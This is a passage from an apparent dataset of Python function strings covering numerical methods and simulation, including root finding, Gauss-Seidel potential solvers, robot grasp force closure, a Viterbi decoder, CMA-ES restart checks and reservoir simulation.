f(x0)\n fx1 = f(x1)\n \n assert (fx0 * fx1) <= 0, \"Root not bracketed\" \n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n fx0, fx1 = fx1, fx0\n \n x2, fx2 = x0, fx0\n \n d = np.nan\n mflag = True\n steps_taken = 0\n \n while steps_taken < max_iter and abs(x1-x0) > tolerance:\n fx0 = f(x0)\n fx1 = f(x1)\n fx2 = f(x2)\n \n if fx0 != fx2 and fx1 != fx2:\n L0 = (x0 * fx1 * fx2) / ((fx0 - fx1) * (fx0 - fx2))\n L1 = (x1 * fx0 * fx2) / ((fx1 - fx0) * (fx1 - fx2))\n L2 = (x2 * fx1 * fx0) / ((fx2 - fx0) * (fx2 - fx1))\n new = L0 + L1 + L2\n \n else:\n new = x1 - ( (fx1 * (x1 - x0)) / (fx1 - fx0) )\n \n tt1 = (new < ((3 * x0 + x1) / 4) or new > x1)\n tt2 = (mflag == True and (abs(new - x1)) >= (abs(x1 - x2) / 2))\n tt3 = (mflag == False and (abs(new - x1)) >= (abs(x2 - d) / 2))\n tt4 = (mflag == True and (abs(x1 - x2)) < tolerance)\n tt5 = (mflag == False and (abs(x2 - d)) < tolerance)\n if (tt1 or\n tt2 or\n tt3 or\n tt4 or\n tt5):\n new = (x0 + x1) / 2\n mflag = True\n \n else:\n mflag = False\n \n fnew = f(new)\n d, x2 = x2, x1\n \n if (fx0 * fnew) < 0:\n x1 = new\n else:\n x0 = new\n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n \n steps_taken += 1\n \n return x1, steps_taken", "def eval_dryfriction():\n # Environment\n env = WAMBallInCupSim(num_dof=7, max_steps=1500)\n\n # Policy (random init)\n policy_hparam = dict(num_feat_per_dim=12, bounds=(np.array([0.0]), np.array([1.0])))\n policy = DualRBFLinearPolicy(env.spec, policy_hparam, dim_mask=2)\n\n # Do the rolllouts\n t_all = []\n qpos_all = []\n dp_vals = [0.0, 0.3, 0.6, 0.9, 1.2]\n print_cbt(f\"Run policy for stiction coefficients: {dp_vals}\")\n for dpv in dp_vals:\n env.reset(\n domain_param=dict(\n joint_1_dryfriction=dpv,\n joint_2_dryfriction=dpv,\n joint_3_dryfriction=dpv,\n joint_4_dryfriction=dpv,\n joint_5_dryfriction=dpv,\n joint_6_dryfriction=dpv,\n joint_7_dryfriction=dpv,\n )\n )\n ro = rollout(env, policy, render_mode=RenderMode(video=False), eval=True)\n t_all.append(ro.time[:-1])\n qpos_all.append(ro.env_infos[\"qpos\"])\n\n # Plot\n fig, ax = plt.subplots(nrows=env.num_dof, sharex=\"all\", figsize=(16, 7))\n for i, idx_joint in enumerate([dof for dof in range(env.num_dof)]):\n ax[i].set_prop_cycle(color=plt.get_cmap(\"cividis\")(np.linspace(0, 1, env.num_dof)))\n ax[i].set_ylabel(f\"joint {idx_joint+1} pos [rad]\")\n for j in range(len(dp_vals)):\n ax[i].plot(t_all[j], qpos_all[j][:, idx_joint], ls=\"--\", label=f\"s = {dp_vals[j]}\")\n if i == 0:\n ax[i].legend(ncol=len(dp_vals))\n ax[-1].set_xlabel(\"time [s]\")\n plt.suptitle(\"Evaluation of joint stiction coefficients\")\n plt.show()", "def weak_repulsion_boundary(Cents,a,k, CV_matrix,n_c,n_C):\n CCW = np.dstack((roll_reverse(Cents[:,:,0]),roll_reverse(Cents[:,:,1])))#np.column_stack((Cents[:,1:3],Cents[:,0].reshape(-1,1,2)))\n CCW_displacement = Cents - CCW\n rij = np.sqrt(CCW_displacement[:,:,0]**2 + CCW_displacement[:,:,1]**2)\n norm_disp = (CCW_displacement.T/rij.T).T\n V_soft_mag = -k*(rij - 2*a)*(rij<2*a)\n V_soft_CCW = (V_soft_mag.T*norm_disp.T).T\n V_soft_CW = -(roll_forward(V_soft_mag).T*norm_disp.T).T\n V_soft = V_soft_CW + V_soft_CCW\n F_soft = np.zeros((n_c, 2))\n for i in range(3):\n F_soft += np.asfortranarray(CV_matrix[:, :, i])@np.asfortranarray(V_soft[:, i])\n F_soft[n_C:] = 0\n return F_soft", "def engine_boost(self):\r\n gamma = 6.67e-11\r\n esc_velocity = np.sqrt((2*gamma*self.home_m*2.0e30)/(self.home_r*10**3))\r\n print esc_velocity\r\n esc_mom, per_force = self.escaped_momentum()\r\n pos, vel,part_esc, impact, part_coll, mom = self.box_collision_info()\r\n\r\n rock_vel = []; rock_vel.append(0)\r\n rock_pos = []; rock_pos.append(0)\r\n #fuel = []; fuel.append(0)\r\n\r\n ##################constants####################\r\n ###############################################\r\n rocket_mass = 1100; num_engine = 1.186e13\r\n rocket_time = 20*60; up_time = 0\r\n mass_esc = (num_engine*part_esc*self.m)/self.total_time\r\n ###############################################\r\n\r\n delta_time = rocket_time/(1000)\r\n i = 0\r\n uptime = 0\r\n fuel = 55000\r\n velocity = 32100\r\n total_force = (esc_mom/self.total_time)*num_engine\r\n print total_force, 'newton'\r\n while (rock_vel[-1] < velocity and up_time < rocket_time and fuel > 0):\r\n total_acceleration = total_force/(rocket_mass + fuel)\r\n\r\n rock_vel.append(rock_vel[-1] + total_acceleration*delta_time)\r\n\r\n #fuel.append(fuel[-1] + mass_esc*delta_time)\r\n fuel -= mass_esc*delta_time\r\n\r\n i +=1\r\n uptime += delta_time\r\n\r\n\r\n if rock_vel[-1] > velocity:\r\n print \"you have reached escape velocity\"\r\n print rock_vel[-1]\r\n print fuel\r\n \"\"\"myStarSystem.massNeededCheck(num_engine, esc_velocity,\r\n total_force/num_engine, part_esc/(self.total_time), fuel[-1])\r\n \"\"\"\r\n if fuel < 0:\r\n print 'fuel done', fuel\r\n print rock_vel[-1], 'm/s'\r\n break\r\n\r\n plot(linspace(0,20*60, len(rock_vel)), rock_vel)\r\n show()\r\n return total_force", "def process_boundary_conditions(self, model):\n\n processed_bcs = {}\n\n # process and set pybamm.variables first incase required\n # in discrisation of other boundary conditions\n for key, bcs in model.boundary_conditions.items():\n processed_bcs[key] = {}\n\n # check if the boundary condition at the origin for sphere domains is other\n # than no flux\n for subdomain in key.domain:\n if (\n self.mesh[subdomain].coord_sys\n in [\"spherical polar\", \"cylindrical polar\"]\n and list(self.mesh.geometry[subdomain].values())[0][\"min\"] == 0\n ):\n if bcs[\"left\"][0].value != 0 or bcs[\"left\"][1] != \"Neumann\":\n raise pybamm.ModelError(\n \"Boundary condition at r = 0 must be a homogeneous \"\n \"Neumann condition for {} coordinates\".format(\n self.mesh[subdomain].coord_sys\n )\n )\n\n # Handle any boundary conditions applied on the tabs\n if any(\"tab\" in side for side in list(bcs.keys())):\n bcs = self.check_tab_conditions(key, bcs)\n\n # Process boundary conditions\n for side, bc in bcs.items():\n eqn, typ = bc\n pybamm.logger.debug(\"Discretise {} ({} bc)\".format(key, side))\n processed_eqn = self.process_symbol(eqn)\n processed_bcs[key][side] = (processed_eqn, typ)\n\n return processed_bcs", "def potentialSolver5(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def basiscond(self): # 3\n res,resargs = self.__obj.basiscond()\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n _nrmbasis_return_value,_nrminvbasis_return_value = resargs\n return _nrmbasis_return_value,_nrminvbasis_return_value", "def _nipals_twoblocks_inner_loop(X, Y, x_kind='linear', y_kind='linear', \n x_params=None, y_params=None, max_iter=500, tol=1e-06,\n flag_first_iter=True, learning_rate=1.):\n# STEP 4\n x_score = f(X, kind=x_kind, params=x_params)[:, [0]]\n# STEP 5\n y_score = f(Y, kind=y_kind, params=y_params)[:, [0]]\n x_weights_old = 0\n ite = 1\n eps = np.finfo(X.dtype).eps\n # Inner loop of the Wold algo.\n# STEP 6\n while True:\n# STEP 7 \n y_score_old = y_score.copy()\n x_score_old = x_score.copy()\n# STEP 8 \n X_hat = f(X, kind=x_kind, params=x_params)\n Y_hat = f(Y, kind=y_kind, params=y_params)\n # 1.1 Update u: the X weights\n # Mode A regress each X column on y_score\n# STEP 9\n x_weights = np.dot(X_hat.T, y_score) / np.dot(y_score.T, y_score)\n # If y_score only has zeros x_weights will only have zeros. In\n # this case add an epsilon to converge to a more acceptable\n # solution\n if np.dot(x_weights.T, x_weights) < eps:\n x_weights += eps\n # 1.2 Normalize u\n x_weights /= np.sqrt(np.dot(x_weights.T, x_weights)) + eps\n # 1.3 Update x_score: the X latent scores\n# STEP 10\n x_score = np.dot(X_hat, x_weights)\n# STEP 11\n if (x_kind not in NONPARAMETRICAL_TRANSROMATIONS) and flag_first_iter:\n J_t = jacob(X, x_score, kind=x_kind, params=x_params)\n delta_x_params = np.linalg.inv(J_t.T.dot(J_t)).dot(J_t.T).dot(x_score - x_score_old)[:, 0]\n# STEP 12\n x_params += learning_rate * delta_x_params\n # 2.1 Update y_weights\n # Mode A regress each Y column on x_score\n# STEP 13\n y_weights = np.dot(Y_hat.T, x_score) / np.dot(x_score.T, x_score)\n y_weights /= np.sqrt(np.dot(y_weights.T, y_weights)) + eps\n # 2.2 Update y_score: the Y latent scores\n# STEP 14\n y_score = np.dot(Y_hat, y_weights)\n# STEP 15\n if (y_kind not in NONPARAMETRICAL_TRANSROMATIONS) and flag_first_iter:\n J_u = jacob(Y, y_score, kind=y_kind, params=y_params)\n delta_y_params = np.linalg.inv(J_u.T.dot(J_u)).dot(J_u.T).dot(y_score - y_score_old)[:, 0]\n# STEP 16\n y_params += learning_rate * delta_y_params\n x_weights_diff = x_weights - x_weights_old\n if np.dot(x_weights_diff.T, x_weights_diff) < tol or Y.shape[1] == 1:\n break\n if ite == max_iter:\n warnings.warn('Maximum number of iterations reached')\n break\n x_weights_old = x_weights\n ite += 1\n return x_weights, y_weights, ite", "def achieves_force_closure(points, normals, mu, debug=False):\n assert len(points) == len(normals)\n assert mu >= 0.0\n assert_unit_normals(normals)\n\n ## YOUR CODE HERE\n G = get_G(points,normals)\n if not is_full_row_rank(G):\n print(\"G is not full row rank\")\n return False\n \n N_points = len(points)\n max_force = 1000\n \n mp = MathematicalProgram()\n \n ## Decision vars\n # force tangent to surface\n forces_x = mp.NewContinuousVariables(N_points,\"forces_x\")\n # force normal to surface\n forces_z = mp.NewContinuousVariables(N_points,\"forces_z\") \n # -1<=slack_var<=0 used to convert inequalities to strict inequalities \n slack_var = mp.NewContinuousVariables(1,\"slack_var\")\n\n # put force vars in single array\n forces = [None]*2*N_points\n for point_idx in range(N_points):\n forces[point_idx*2] = forces_x[point_idx]\n forces[point_idx*2+1] = forces_z[point_idx]\n\n # ensure forces/moments add to zero\n for row_idx in range(np.shape(G)[0]):\n # 3 rows (LMB_x, LMB_z, AMB) = 0 for static system\n mp.AddLinearConstraint(G[row_idx,:].dot(forces) == 0)\n if debug:\n print(\"Static force/moment constraints = 0:\")\n print(G[row_idx,:].dot(forces))\n \n # ensure forces stay within friction cone and use slack to avoid trivial 0 solution\n for point_idx in range(N_points):\n # normal force must be positive (slack allows us to catch if it's zero)\n mp.AddLinearConstraint(forces_z[point_idx] + slack_var[0] >= 0)\n mp.AddLinearConstraint(forces_x[point_idx] <= mu*forces_z[point_idx] + slack_var[0])\n mp.AddLinearConstraint(forces_x[point_idx] >= -(mu*forces_z[point_idx] + slack_var[0]))\n \n # restrict slack\n mp.AddLinearConstraint(slack_var[0] <= 0)\n mp.AddLinearConstraint(slack_var[0] >= -1)\n mp.AddLinearCost(slack_var[0])\n \n # restrict solution within bounds\n for force in forces:\n mp.AddLinearConstraint(force >= -max_force)\n mp.AddLinearConstraint(force <= max_force) \n \n result = Solve(mp)\n if (not result.is_success()):\n print(\"solver failed to find solution\")\n return False\n \n gamma = result.GetSolution(slack_var)\n if (gamma < 0):\n print(\"acheived force closure, gamma = {}\".format(gamma))\n if debug:\n x = result.GetSolution(forces_x)\n z = result.GetSolution(forces_z)\n print(\"solution forces_x: {}\".format(x))\n print(\"solution forces_z: {}\".format(z))\n return True\n else:\n print(\"only trivial solution with 0 forces found\")\n return False", "def impose_boundary_conditions(self) -> _ImposeBoundaryConditionsResults:\n\n stiffness = self.get_stiffness_matrix()\n force_vector = self.get_force_vector()\n\n restrained_dofs = self.get_supported_dofs()\n\n for axis in range(2):\n stiffness = np.delete(\n stiffness,\n [dof for dof in restrained_dofs],\n axis=axis,\n )\n\n force_vector = np.delete(\n force_vector,\n [dof for dof in restrained_dofs],\n axis=0,\n )\n\n return _ImposeBoundaryConditionsResults(\n stiffness=stiffness,\n force=force_vector,\n )", "def potentialSolver4(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def checkLocalRestartConditions(self, evalcount):\n\n if not self.local_restart:\n return False\n\n debug = False\n\n restart_required = False\n diagC = diag(self.C).reshape(-1, 1)\n tmp = append(abs(self.p_c), sqrt(diagC), axis=1)\n a = int(mod(evalcount/self.lambda_-1, self.n))\n\n # TolX\n if all(self.sigma*(max(tmp, axis=1)) < self.tolx):\n if debug:\n print('TolX')\n restart_required = True\n\n # TolUPX\n elif any(self.sigma*sqrt(diagC)) > self.tolupx:\n if debug:\n print('TolUPX')\n restart_required = True\n\n # No effective axis\n elif all(0.1*self.sigma*self.D[a, 0]*self.B[:, a] + self.wcm == self.wcm):\n if debug:\n print('noeffectaxis')\n restart_required = True\n\n # No effective coordinate\n elif any(0.2*self.sigma*sqrt(diagC) + self.wcm == self.wcm):\n if debug:\n print('noeffectcoord')\n restart_required = True\n\n # Condition of C\n elif cond(self.C) > self.conditioncov:\n if debug:\n print('condcov')\n restart_required = True\n\n elif mod(evalcount, self.lambda_) == self.nbin and \\\n max(self.histfunevals) - min(self.histfunevals) < self.tolfun:\n if debug:\n print('tolfun')\n restart_required = True\n\n # Adjust step size in case of equal function values\n elif self.is_fitness_flat:\n if debug:\n print('flatfitness')\n restart_required = True\n\n # A mismatch between sigma increase and decrease of all eigenvalues in C\n elif self.sigma / 1 > self.tolupsigma*max(self.D):\n if debug:\n print('tolupsigma')\n restart_required = True\n\n # Stagnation, median of most recent 20 best values is no better than that of the oldest 20 medians/generation\n elif len(self.stagnation_list) > 20 and len(self.recent_best_fitnesses) > 20 and \\\n median(self.stagnation_list[:20]) > median(self.recent_best_fitnesses):\n if debug:\n print('stagnation')\n restart_required = True\n\n return restart_required", "def run_grav(self):\n\n # Solucao direta\n self.prod_w = []\n self.prod_o = []\n t0 = time.time()\n # self.set_volumes_in_primal()\n self.set_sat_in()\n self.set_lamb_2()\n self.set_global_problem_vf_3_gr1_bif()\n self.Pf = self.solve_linear_problem(self.trans_fine, self.b, len(self.all_fine_vols_ic))\n self.organize_Pf()\n del self.Pf\n self.mb.tag_set_data(self.pf_tag, self.all_fine_vols, np.asarray(self.Pf_all))\n del self.Pf_all\n self.test_conservation_fine()\n # self.store_flux_pf_gr_bif = self.create_flux_vector_pf_gr_bif_1()\n\n \"\"\"\n ################################################################\n # Solucao Multiescala\n self.calculate_restriction_op_2()\n self.calculate_prolongation_op_het()\n self.organize_op()\n self.Tc = self.modificar_matriz(self.pymultimat(self.pymultimat(self.trilOR, self.trans_fine, self.nf_ic), self.trilOP, self.nf_ic), self.nc, self.nc)\n self.Qc = self.modificar_vetor(self.multimat_vector(self.trilOR, self.nf_ic, self.b), self.nc)\n self.Pc = self.solve_linear_problem(self.Tc, self.Qc, self.nc)\n self.set_Pc()\n self.Pms = self.multimat_vector(self.trilOP, self.nf_ic, self.Pc)\n\n del self.trilOP\n del self.trilOR\n del self.Tc\n del self.Qc\n del self.Pc\n\n self.organize_Pms()\n del self.Pms\n self.mb.tag_set_data(self.pms_tag, self.all_fine_vols, np.asarray(self.Pms_all))\n del self.Pms_all\n self.erro()\n\n self.test_conservation_coarse_gr()\n # self.Neuman_problem_6_gr()\n # self.store_flux_pms_gr = self.create_flux_vector_pms_gr()\n ####################################################################\n \"\"\"\n\n\n\n\n\n\n\n print('acaboooou')\n self.mb.write_file('new_out_bif_gr.vtk')\n\n\n shutil.copytree(self.caminho1, self.pasta)", "def PGD(Params, relaxationVars, fixedBs, fixedTs, data):\n Tol = Params[\"tol\"]\n TolCD = Params[\"tolCD\"]\n Lambda0 = Params[\"Lambda\"]\n Lambda1 = Params[\"alpha\"] * Lambda0\n M = Params[\"M\"]\n y = data.ycentered # data.y - data.ybar\n\n Bindices = relaxationVars.BActive.copy() # list\n Tindices = relaxationVars.TActive.copy() # list of tuples (i,j)\n currentB, currentT = relaxationVars.initialSol.ToArray(Bindices, Tindices)\n fixedB = fixedBs.copy() # Dict. key = index, value = 0 or 1 (no index if not fixed)\n fixedT = fixedTs.copy() # Dict. key = (i,j), value = 0 or 1 (no index if not fixed)\n DualInitial = relaxationVars.useDual\n\n # Store the index mappings\n Bmap = {} # Bmap[i] = index of i in currentB or XB\n for i in range(len(Bindices)):\n Bmap[Bindices[i]] = i\n\n Tmap = {} # Tmap[(i,j)] = index of interaction in XT and currentT\n for i in range(len(Tindices)):\n c1, c2 = Tindices[i]\n Tmap[(c1, c2)] = i\n Tmap[(c2, c1)] = i\n\n # Next: Some sanity checks (those can be removed if we're carful about the\n # inputs)\n\n # Make sure if B_i is fixed to 0 then all T_{ij}'s (in Tindices) are also\n # fixed to zero\n for i, val in fixedB.items():\n if val == 0:\n for l, j in Tmap:\n if l < j and (l == i or j == i):\n fixedT[(l, j)] = 0\n\n # Make sure if T_{ij} is fixed to 1 then both B_i and B_j are fixed to 1\n for key, val in fixedT.items():\n if val == 1:\n i, j = key\n fixedB[i] = 1\n fixedB[j] = 1\n\n # Delete from Bindices and Tindices all the indices s.t. z_i = 0 / z_{ij}\n # = 0\n Bzeros = []\n for i, val in fixedB.items():\n if val == 0:\n Bzeros.append(Bmap[i])\n for i in sorted(Bzeros, reverse=True):\n del Bindices[i]\n currentB = np.delete(currentB, Bzeros)\n\n Tzeros = []\n for key, val in fixedT.items():\n if val == 0:\n Tzeros.append(Tmap[key])\n for i in sorted(Tzeros, reverse=True):\n del Tindices[i]\n currentT = np.delete(currentT, Tzeros)\n\n # Update the index mappings\n Bmap = {} # Bmap[i] = index of i in currentB or XB\n for i in range(len(Bindices)):\n Bmap[Bindices[i]] = i\n\n Tmap = {} # Tmap[(i,j)] = index of interaction in XT and currentT\n for i in range(len(Tindices)):\n c1, c2 = Tindices[i]\n Tmap[(c1, c2)] = i\n Tmap[(c2, c1)] = i\n\n # End of sanity checks\n\n # Retrive the matrices of the optimization variables\n # Later: We can store the centered columns (but this will require twice\n # the memory)\n XB, XT = data.Retrieve(Bindices, Tindices)\n XBMean = XB.mean(axis=0)\n XB = XB - XBMean\n XTMean = XT.mean(axis=0)\n XT = XT - XTMean\n\n Bfree = [i for i in Bindices if i not in fixedB]\n Tfree = [(i, j) for i, j in Tmap if i < j and (i, j) not in fixedT]\n TfreeIndices = [Tmap[(i, j)]\n for i, j in Tmap if i < j and (i, j) not in fixedT]\n lenFixedB = len(Bindices) - len(Bfree)\n lenFixedT = len([key for key in fixedT if fixedT[key] == 1])\n\n # (Dual) Block CD Variables\n u = defaultdict(float)\n w = defaultdict(dict)\n if not DualInitial:\n for i in Bindices:\n u[i] = 0\n for pair in Tmap:\n i, j = pair\n w[i][j] = 0\n else:\n for i in Bindices:\n if i in relaxationVars.u and i not in fixedB:\n u[i] = relaxationVars.u[i]\n else:\n u[i] = 0\n for i, j in Tmap:\n if j in relaxationVars.w[i] and (min(i, j), max(\n i, j)) not in fixedT and i not in fixedB and j not in fixedB:\n 